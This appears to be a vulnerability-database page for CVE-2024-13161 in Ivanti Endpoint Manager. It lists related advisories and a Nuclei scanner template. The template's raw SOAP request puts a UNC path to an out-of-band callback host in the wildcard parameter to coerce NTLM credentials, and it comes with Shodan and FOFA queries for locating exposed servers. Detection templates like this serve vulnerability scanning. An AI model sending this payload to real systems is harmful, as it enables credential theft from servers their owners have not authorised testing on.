| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
| CVE-2024-13161 | 14 Jan 202500:00 | – | attackerkb | |
| The vulnerability of the Ivanti EPM endpoint management software lies in the improper restriction of path names in the catalog, which allows a malicious actor to gain unauthorized access to protected information. | 17 Jan 202500:00 | – | bdu_fstec | |
| CVE-2024-13161 | 14 Jan 202517:21 | – | circl | |
| Ivanti Endpoint Manager (EPM) Absolute Path Traversal Vulnerability | 10 Mar 202500:00 | – | cisa_kev | |
| CISA Adds Five Known Exploited Vulnerabilities to Catalog | 10 Mar 202512:00 | – | cisa | |
| Ivanti EPM 安全漏洞 | 14 Jan 202500:00 | – | cnnvd | |
| CVE-2024-13161 | 14 Jan 202517:11 | – | cve | |
| CVE-2024-13161 | 14 Jan 202517:11 | – | cvelist | |
| Security Advisory EPM January 2025 for EPM 2024 and EPM 2022 SU6 | 13 Jan 202521:46 | – | ivanti | |
| Ivanti Endpoint Manager 2022 SU6 - January 2025 Security Update | 17 Jan 202500:00 | – | nessus |
id: CVE-2024-13161
info:
name: Ivanti EPM - Credential Coercion Vulnerability in GetHashForSingleFile
author: ritikchaddha
severity: critical
description: |
A vulnerability in Ivanti Endpoint Manager (EPM) allows an unauthenticated attacker to coerce the EPM machine account credential via the GetHashForSingleFile endpoint. The vulnerability exists due to improper input validation in the wildcard parameter, allowing an attacker to specify a remote UNC path that triggers NTLM authentication.
impact: |
Unauthenticated attackers can coerce NTLM authentication from the EPM server via UNC paths, allowing credential theft through man-in-the-middle attacks.
remediation: |
Update Ivanti Endpoint Manager (EPM) to a patched version that addresses CVE-2024-13161.
reference:
- https://www.horizon3.ai/attack-research/attack-blogs/ivanti-endpoint-manager-multiple-credential-coercion-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2024-13161
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-13161
cwe-id: CWE-36
epss-score: 0.88518
epss-percentile: 0.99755
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:362091310
fofa-query: icon_hash="362091310"
tags: cve,cve2024,ivanti,epm,ntlm,traversal,kev,vkev,vuln
variables:
file: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: text/xml
Soapaction: http://tempuri.org/GetHashForSingleFile
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetHashForSingleFile xmlns="http://tempuri.org/">
<wildcard>\\{{interactsh-url}}\tmp\{{file}}.txt</wildcard>
</GetHashForSingleFile>
</soap:Body>
</soap:Envelope>
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(body, "<GetHashForSingleFileResponse")'
- 'contains(content_type, "text/xml")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502201ff7cd7a4a0bb9067f4e0677583eb6b2170bad45a08d7985486523d1886db6d4022100dd129ed8ef12dec6f7ee25a1a190fcfcc50845b3b82df50b66930d7e30f01122:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation